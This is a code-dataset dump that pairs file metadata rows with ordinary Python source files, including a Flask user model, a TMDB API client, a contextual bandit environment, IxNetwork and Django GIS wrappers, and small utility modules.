| 8.142857 | 19 | 0.473684 | 13 | 57 | 2.076923 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 0.385965 | 57 | 6 | 20 | 9.5 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
82d5bb75b413a08d2de3cb014d6aab551ea19273 | 184 | py | Python | ddf_library/functions/graph.py | eubr-bigsea/Compss-Python | 09ab7c474c8badc9932de3e1148f62ffba16b0b2 | [
"Apache-2.0"
] | 3 | 2017-08-22T11:32:02.000Z | 2021-08-09T09:35:51.000Z | ddf_library/functions/graph.py | eubr-bigsea/Compss-Python | 09ab7c474c8badc9932de3e1148f62ffba16b0b2 | [
"Apache-2.0"
] | null | null | null | ddf_library/functions/graph.py | eubr-bigsea/Compss-Python | 09ab7c474c8badc9932de3e1148f62ffba16b0b2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Lucas Miguel S Ponce"
__email__ = "lucasmsp@gmail.com"
from .graph_lib.page_rank import PageRank
__all__ = ['PageRank']
| 18.4 | 41 | 0.701087 | 25 | 184 | 4.6 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.141304 | 184 | 9 | 42 | 20.444444 | 0.71519 | 0.233696 | 0 | 0 | 0 | 0 | 0.330935 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7d5b18fc1f3a02ab430fc9c26b18a1986acc5a4b | 1,428 | py | Python | flaskTest/dbModel.py | LeeKeBo/flaskSystem | aa67228cf941bf9ad04048bf249c0fe8236386d2 | [
"MIT"
] | 2 | 2020-02-22T09:12:40.000Z | 2021-01-07T03:56:14.000Z | flaskTest/dbModel.py | LeeKeBo/flaskSystem | aa67228cf941bf9ad04048bf249c0fe8236386d2 | [
"MIT"
] | null | null | null | flaskTest/dbModel.py | LeeKeBo/flaskSystem | aa67228cf941bf9ad04048bf249c0fe8236386d2 | [
"MIT"
] | null | null | null | '''
@Description: 数据库类
@Author: lkb
@Date: 2019-08-07 14:07:10
@LastEditTime: 2019-08-14 19:52:07
@LastEditors:
'''
from config import app
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy(app)
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, nullable=False,
primary_key=True, autoincrement=True)
# role_id = db.Column(db.Integer,nullable = False,unique = True)
name = db.Column(db.String(30),nullable=False,unique = True)
password = db.Column(db.String(50),nullable = False)
def __repr__(self):
return '<User %r>' % self.name
# class Role(db.Model):
# __tablename__ = 'roles'
# id = db.Column(db.Integer, nullable=False,
# primary_key=True, autoincrement=True)
# name = db.Column(db.String(16), nullable=False,
# server_default='', unique=True)
# def __repr__(self):
# return '<Role %r>' % self.name
# class User(db.Model):
# __tablename__ = 'users'
# id = db.Column(db.Integer, nullable=False,
# primary_key=True, autoincrement=True)
# username = db.Column(db.String(32), nullable=False,
# unique=True, server_default='', index=True)
# role_id = db.Column(db.Integer, nullable=False, server_default='0')
# def __repr__(self):
# return '<User %r,Role id %r>' % (self.username, self.role_id)
| 30.382979 | 73 | 0.616947 | 180 | 1,428 | 4.705556 | 0.305556 | 0.085006 | 0.106257 | 0.070838 | 0.487603 | 0.487603 | 0.383707 | 0.383707 | 0.383707 | 0.293979 | 0 | 0.034007 | 0.238095 | 1,428 | 46 | 74 | 31.043478 | 0.744485 | 0.657563 | 0 | 0 | 0 | 0 | 0.030172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.181818 | 0.090909 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
7d5c484e66684e48b35b7c8bd76f3a18abb835bf | 12,947 | py | Python | ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/switchports_196704c0d1df9b9f03a2d98b3cd0a010.py | rfrye-github/ixnetwork_restpy | 23eeb24b21568a23d3f31bbd72814ff55eb1af44 | [
"MIT"
] | null | null | null | ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/switchports_196704c0d1df9b9f03a2d98b3cd0a010.py | rfrye-github/ixnetwork_restpy | 23eeb24b21568a23d3f31bbd72814ff55eb1af44 | [
"MIT"
] | null | null | null | ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/switchports_196704c0d1df9b9f03a2d98b3cd0a010.py | rfrye-github/ixnetwork_restpy | 23eeb24b21568a23d3f31bbd72814ff55eb1af44 | [
"MIT"
] | null | null | null | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class SwitchPorts(Base):
"""This object allows to define the attributes for the physical Switch Ports.
The SwitchPorts class encapsulates a list of switchPorts resources that are managed by the user.
A list of resources can be retrieved from the server using the SwitchPorts.find() method.
The list can be managed by using the SwitchPorts.add() and SwitchPorts.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'switchPorts'
_SDM_ATT_MAP = {
'Enabled': 'enabled',
'EthernetAddress': 'ethernetAddress',
'NumberOfPorts': 'numberOfPorts',
'PortName': 'portName',
'PortNumber': 'portNumber',
}
def __init__(self, parent):
super(SwitchPorts, self).__init__(parent)
@property
def AdvertisedFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.advertisedfeatures_265f4d3fb82c9feee971cbb4d61bcb16.AdvertisedFeatures): An instance of the AdvertisedFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.advertisedfeatures_265f4d3fb82c9feee971cbb4d61bcb16 import AdvertisedFeatures
return AdvertisedFeatures(self)._select()
@property
def Config(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.config_62b7c65bc219bf58bd290f568c5c62cd.Config): An instance of the Config class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.config_62b7c65bc219bf58bd290f568c5c62cd import Config
return Config(self)._select()
@property
def CurrentFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.currentfeatures_f89233df2b9b91ce4ac0f454eece515a.CurrentFeatures): An instance of the CurrentFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.currentfeatures_f89233df2b9b91ce4ac0f454eece515a import CurrentFeatures
return CurrentFeatures(self)._select()
@property
def PeerAdvertisedFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.peeradvertisedfeatures_a19ddfa517ec69fdc6448dae922b1e2c.PeerAdvertisedFeatures): An instance of the PeerAdvertisedFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.peeradvertisedfeatures_a19ddfa517ec69fdc6448dae922b1e2c import PeerAdvertisedFeatures
return PeerAdvertisedFeatures(self)._select()
@property
def State(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.state_323b40267b7188796bf681a8a171debc.State): An instance of the State class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.state_323b40267b7188796bf681a8a171debc import State
return State(self)._select()
@property
def SupportedFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.supportedfeatures_f9ca2c9da9413f9de97ac5ce0832e78f.SupportedFeatures): An instance of the SupportedFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.supportedfeatures_f9ca2c9da9413f9de97ac5ce0832e78f import SupportedFeatures
return SupportedFeatures(self)._select()
@property
def SwitchPortQueues(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.switchportqueues_85c93c375f96f8d70346886eaacbe1fa.SwitchPortQueues): An instance of the SwitchPortQueues class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.switchportqueues_85c93c375f96f8d70346886eaacbe1fa import SwitchPortQueues
return SwitchPortQueues(self)
@property
def Enabled(self):
"""
Returns
-------
- bool: If true, the ports in the selected port range are added to the switch.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def EthernetAddress(self):
"""
Returns
-------
- str: Indicates the hardware address of the ports in the port range.
"""
return self._get_attribute(self._SDM_ATT_MAP['EthernetAddress'])
@EthernetAddress.setter
def EthernetAddress(self, value):
self._set_attribute(self._SDM_ATT_MAP['EthernetAddress'], value)
@property
def NumberOfPorts(self):
"""
Returns
-------
- number: Specifies the number of ports in a port range.
"""
return self._get_attribute(self._SDM_ATT_MAP['NumberOfPorts'])
@NumberOfPorts.setter
def NumberOfPorts(self, value):
self._set_attribute(self._SDM_ATT_MAP['NumberOfPorts'], value)
@property
def PortName(self):
"""
Returns
-------
- str: Indicates the name for the switch port interface.
"""
return self._get_attribute(self._SDM_ATT_MAP['PortName'])
@PortName.setter
def PortName(self, value):
self._set_attribute(self._SDM_ATT_MAP['PortName'], value)
@property
def PortNumber(self):
"""
Returns
-------
- str: Indicates a value that the datapath associates with a physical port.
"""
return self._get_attribute(self._SDM_ATT_MAP['PortNumber'])
@PortNumber.setter
def PortNumber(self, value):
self._set_attribute(self._SDM_ATT_MAP['PortNumber'], value)
def update(self, Enabled=None, EthernetAddress=None, NumberOfPorts=None, PortName=None, PortNumber=None):
"""Updates switchPorts resource on the server.
Args
----
- Enabled (bool): If true, the ports in the selected port range are added to the switch.
- EthernetAddress (str): Indicates the hardware address of the ports in the port range.
- NumberOfPorts (number): Specifies the number of ports in a port range.
- PortName (str): Indicates the name for the switch port interface.
- PortNumber (str): Indicates a value that the datapath associates with a physical port.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Enabled=None, EthernetAddress=None, NumberOfPorts=None, PortName=None, PortNumber=None):
"""Adds a new switchPorts resource on the server and adds it to the container.
Args
----
- Enabled (bool): If true, the ports in the selected port range are added to the switch.
- EthernetAddress (str): Indicates the hardware address of the ports in the port range.
- NumberOfPorts (number): Specifies the number of ports in a port range.
- PortName (str): Indicates the name for the switch port interface.
- PortNumber (str): Indicates a value that the datapath associates with a physical port.
Returns
-------
- self: This instance with all currently retrieved switchPorts resources using find and the newly added switchPorts resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained switchPorts resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, Enabled=None, EthernetAddress=None, NumberOfPorts=None, PortName=None, PortNumber=None):
"""Finds and retrieves switchPorts resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve switchPorts resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all switchPorts resources from the server.
Args
----
- Enabled (bool): If true, the ports in the selected port range are added to the switch.
- EthernetAddress (str): Indicates the hardware address of the ports in the port range.
- NumberOfPorts (number): Specifies the number of ports in a port range.
- PortName (str): Indicates the name for the switch port interface.
- PortNumber (str): Indicates a value that the datapath associates with a physical port.
Returns
-------
- self: This instance with matching switchPorts resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of switchPorts data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the switchPorts resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def SimulatePortUpDown(self):
"""Executes the simulatePortUpDown operation on the server.
Exec to simulate port up and down.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('simulatePortUpDown', payload=payload, response_object=None)
| 42.172638 | 208 | 0.669962 | 1,378 | 12,947 | 6.203919 | 0.183599 | 0.029477 | 0.014739 | 0.057317 | 0.605802 | 0.577728 | 0.565329 | 0.565329 | 0.553047 | 0.437829 | 0 | 0.026985 | 0.252954 | 12,947 | 306 | 209 | 42.310458 | 0.856907 | 0.548544 | 0 | 0.141176 | 0 | 0 | 0.056831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.282353 | false | 0 | 0.105882 | 0 | 0.635294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7d62e720d36d47bfea3c09562c3414a20ed8fe6e | 222 | py | Python | week1/skimage_save_image.py | Mohamed-Magid/image-processing | eeda9a57cb1c3370c66f82873f9162ba5d711a3b | [
"MIT"
] | 3 | 2020-11-03T20:54:43.000Z | 2020-11-04T03:15:55.000Z | week1/skimage_save_image.py | Mohamed-Magid/image-processing | eeda9a57cb1c3370c66f82873f9162ba5d711a3b | [
"MIT"
] | null | null | null | week1/skimage_save_image.py | Mohamed-Magid/image-processing | eeda9a57cb1c3370c66f82873f9162ba5d711a3b | [
"MIT"
] | 1 | 2020-12-01T20:43:18.000Z | 2020-12-01T20:43:18.000Z | # import io from scikit-image library
from skimage import io
img = io.imread(fname= 'imagename.jpg' )
# do some process here :)
# save the image
io.imsave(fname= 'C:\\Users\\username\\Pictures\\newimagename.jpg' , arr=img) | 37 | 77 | 0.72973 | 34 | 222 | 4.764706 | 0.735294 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126126 | 222 | 6 | 77 | 37 | 0.835052 | 0.333333 | 0 | 0 | 0 | 0 | 0.413793 | 0.324138 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
7d707ea5678cfc7edee0c341c89c85bf86eb4fa2 | 501 | py | Python | raven/response/_profile/_finalYearProject/finalYearProject.py | jawahar273/Tx | d595ebd347194402984505a051f842854ce0fc9f | [
"MIT"
] | null | null | null | raven/response/_profile/_finalYearProject/finalYearProject.py | jawahar273/Tx | d595ebd347194402984505a051f842854ce0fc9f | [
"MIT"
] | null | null | null | raven/response/_profile/_finalYearProject/finalYearProject.py | jawahar273/Tx | d595ebd347194402984505a051f842854ce0fc9f | [
"MIT"
] | null | null | null | from raven.response.abstract_response import BaseResponse
class FinalYearProject(BaseResponse):
def __init__(self, scope=None):
super(FinalYearProject, self).__init__(self, scope=scope)
def get_class_name(self):
return self.__class__.__name__
def render(self, pretty=None):
self.class_name = self.get_class_name() # class name
super().render(class_name=self.class_name, sub_path="_profile")
return self.render_template.render(pretty=pretty)
| 27.833333 | 71 | 0.722555 | 62 | 501 | 5.403226 | 0.370968 | 0.18806 | 0.116418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177645 | 501 | 17 | 72 | 29.470588 | 0.813107 | 0.01996 | 0 | 0 | 0 | 0 | 0.01636 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7d7f36806053745669e9fe2c848a79d32fde381e | 1,227 | py | Python | tmdb/route/collection.py | leandcesar/tmdb-python | a6933d4f8807b07d8f09d0cf9d45555b5a8212f7 | [
"MIT"
] | null | null | null | tmdb/route/collection.py | leandcesar/tmdb-python | a6933d4f8807b07d8f09d0cf9d45555b5a8212f7 | [
"MIT"
] | 1 | 2022-03-08T15:08:34.000Z | 2022-03-08T15:08:34.000Z | tmdb/route/collection.py | leandcesar/tmdb-python | a6933d4f8807b07d8f09d0cf9d45555b5a8212f7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .base import Base, Response
class Collection(Base):
async def details(self, collection_id: int) -> Response:
"""Get collection details by id.
See more: https://developers.themoviedb.org/3/collections/get-collection-details
"""
return await self.request(f"collection/{collection_id}")
async def images(self, collection_id: int) -> Response:
"""Get the images for a collection by id.
See more: https://developers.themoviedb.org/3/collections/get-collection-images
"""
return await self.request(f"collection/{collection_id}/images")
async def translations(self, collection_id: int) -> Response:
"""Get the list translations for a collection by id.
See more: https://developers.themoviedb.org/3/collections/get-collection-translations
"""
return await self.request(f"collection/{collection_id}/translations")
async def search(self, query: str, *, page: int = 1) -> Response:
"""Search for collections.
See more: https://developers.themoviedb.org/3/search/search-collections
"""
return await self.request("search/collection", query=query, page=page)
| 37.181818 | 93 | 0.668297 | 149 | 1,227 | 5.463087 | 0.268456 | 0.088452 | 0.058968 | 0.108108 | 0.59828 | 0.59828 | 0.561425 | 0.436118 | 0.27027 | 0.27027 | 0 | 0.00616 | 0.206194 | 1,227 | 32 | 94 | 38.34375 | 0.829569 | 0.017115 | 0 | 0 | 0 | 0 | 0.176923 | 0.150769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7d84429e9c277e9e73000091170f571c7b268018 | 1,263 | py | Python | plan2explore/tools/count_dataset.py | sarthak268/plan2explore | 264f513d46c6e971d5523782344a694b17139a20 | [
"Apache-2.0"
] | 189 | 2020-05-13T01:12:03.000Z | 2022-03-23T01:38:56.000Z | plan2explore/tools/count_dataset.py | sarthak268/plan2explore | 264f513d46c6e971d5523782344a694b17139a20 | [
"Apache-2.0"
] | 13 | 2020-05-12T22:51:07.000Z | 2022-03-12T00:28:47.000Z | plan2explore/tools/count_dataset.py | sarthak268/plan2explore | 264f513d46c6e971d5523782344a694b17139a20 | [
"Apache-2.0"
] | 24 | 2020-05-14T03:47:50.000Z | 2021-09-26T04:20:36.000Z | # Copyright 2019 The Dreamer Authors. Copyright 2020 Plan2Explore Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
def count_dataset(directory):
directory = os.path.expanduser(directory)
if not tf.gfile.Exists(directory):
message = "Data set directory '{}' does not exist."
raise ValueError(message.format(directory))
pattern = os.path.join(directory, '*.npz')
def func():
filenames = tf.gfile.Glob(pattern)
episodes = len(filenames)
episodes = np.array(episodes, dtype=np.int32)
return episodes
return tf.py_func(func, [], tf.int32)
| 34.135135 | 95 | 0.752969 | 181 | 1,263 | 5.165746 | 0.607735 | 0.064171 | 0.051337 | 0.034225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016144 | 0.166271 | 1,263 | 36 | 96 | 35.083333 | 0.871795 | 0.487728 | 0 | 0 | 0 | 0 | 0.06951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.555556 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7d8a47c6b5f6676897908197271d088deee316aa | 2,041 | py | Python | envs/contextual.py | leilayasmeen/Bandits | 701c0385e6536380240e7de2d509294e6d3e4fba | [
"MIT"
] | null | null | null | envs/contextual.py | leilayasmeen/Bandits | 701c0385e6536380240e7de2d509294e6d3e4fba | [
"MIT"
] | null | null | null | envs/contextual.py | leilayasmeen/Bandits | 701c0385e6536380240e7de2d509294e6d3e4fba | [
"MIT"
] | null | null | null | import numpy as np
import numpy.random as npr
from .base import Environment, Feedback, Spec
class ContextualEnv(Environment):
def __init__(self, arms, sd):
super().__init__()
self.arms = arms
self.sd = sd
self.max_rew = None
self.mean_rews = None
@property
def k(self):
return self.arms.shape[0]
@property
def d(self):
return self.arms.shape[1]
@property
def regrets(self):
return self.max_rew - self.mean_rews
def create_spec(self):
ctx = npr.randn(self.d) # Note to self: K x d data generated here. K = number of arms, d = dimensions
#self.mean_rews = self.arms.dot(ctx)
self.mean_rews = np.linalg.norm(np.multiply(self.arms, ctx[np.newaxis, :]), ord=1, axis=1)
self.max_rew = np.max(self.mean_rews)
return ContextualSpec(self.t, ctx)
def get_feedback(self, arm, spec=None):
if spec is None:
spec = self.spec
mean_rews = self.mean_rews
max_rew = self.max_rew
else:
mean_rews = self.arms.dot(spec.ctx)
max_rew = np.max(mean_rews)
mean = mean_rews[arm]
noise = npr.randn() * self.sd
rew = mean + noise
return ContextualFeedback(spec, arm, rew, noise, max_rew)
class ContextualSpec(Spec):
def __init__(self, t, ctx):
super().__init__(t)
self.ctx = ctx
class ContextualFeedback(Feedback):
def __init__(self, spec, arm, rew, noise, max_rew):
super().__init__(spec, arm, rew)
self.noise = noise
self.max_rew = max_rew
@property
def t(self):
return self.spec.t
@property
def ctx(self):
return self.spec.ctx
@property
def mean_rew(self):
return self.rew - self.noise
@property
def regret(self):
return self.max_rew - self.mean_rew
def __repr__(self):
return f'CtxFb(arm={self.arm}, reg={self.regret}, noise={self.noise}, mean={self.mean_rew})'
| 22.677778 | 110 | 0.596766 | 282 | 2,041 | 4.12766 | 0.230496 | 0.056701 | 0.084192 | 0.030928 | 0.156357 | 0.084192 | 0.04811 | 0 | 0 | 0 | 0 | 0.002764 | 0.291034 | 2,041 | 89 | 111 | 22.932584 | 0.801659 | 0.053895 | 0 | 0.118644 | 0 | 0.016949 | 0.042531 | 0.021784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.220339 | false | 0 | 0.050847 | 0.135593 | 0.491525 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
7d8e965ebab40059e6e3070f94f4096443db96be | 1,114 | py | Python | google-cloud-sdk/lib/surface/service_management/versions/__init__.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/lib/surface/service_management/versions/__init__.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/lib/surface/service_management/versions/__init__.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | 3 | 2017-07-27T18:44:13.000Z | 2020-07-25T17:48:53.000Z | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Package for the service-management/versions CLI subcommands."""
from googlecloudsdk.calliope import base
# NOTE: These are deprecated, so not included in the GA release track
# Users should use the functionally identical configs subcommand group.
@base.ReleaseTracks(base.ReleaseTrack.BETA)
@base.Hidden
class Versions(base.Group):
"""Manage versions for various services.
DEPRECATED: This command group is deprecated and will be removed.
Use 'gcloud beta service-management configs' instead.
"""
| 37.133333 | 77 | 0.768402 | 160 | 1,114 | 5.35 | 0.66875 | 0.070093 | 0.030374 | 0.037383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008556 | 0.160682 | 1,114 | 29 | 78 | 38.413793 | 0.906952 | 0.837522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7d944587baa07e1086ac27a1de94e3840d79286e | 646 | py | Python | django/contrib/gis/db/backends/mysql/base.py | webjunkie/django | 5dbca13f3baa2e1bafd77e84a80ad6d8a074712e | [
"BSD-3-Clause"
] | 790 | 2015-01-03T02:13:39.000Z | 2020-05-10T19:53:57.000Z | django/contrib/gis/db/backends/mysql/base.py | mradziej/django | 5d38965743a369981c9a738a298f467f854a2919 | [
"BSD-3-Clause"
] | 1,361 | 2015-01-08T23:09:40.000Z | 2020-04-14T00:03:04.000Z | django/contrib/gis/db/backends/mysql/base.py | mradziej/django | 5d38965743a369981c9a738a298f467f854a2919 | [
"BSD-3-Clause"
] | 155 | 2015-01-08T22:59:31.000Z | 2020-04-08T08:01:53.000Z | from django.db.backends.mysql.base import *
from django.db.backends.mysql.base import DatabaseWrapper as MySQLDatabaseWrapper
from django.contrib.gis.db.backends.mysql.creation import MySQLCreation
from django.contrib.gis.db.backends.mysql.introspection import MySQLIntrospection
from django.contrib.gis.db.backends.mysql.operations import MySQLOperations
class DatabaseWrapper(MySQLDatabaseWrapper):
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.creation = MySQLCreation(self)
self.ops = MySQLOperations(self)
self.introspection = MySQLIntrospection(self)
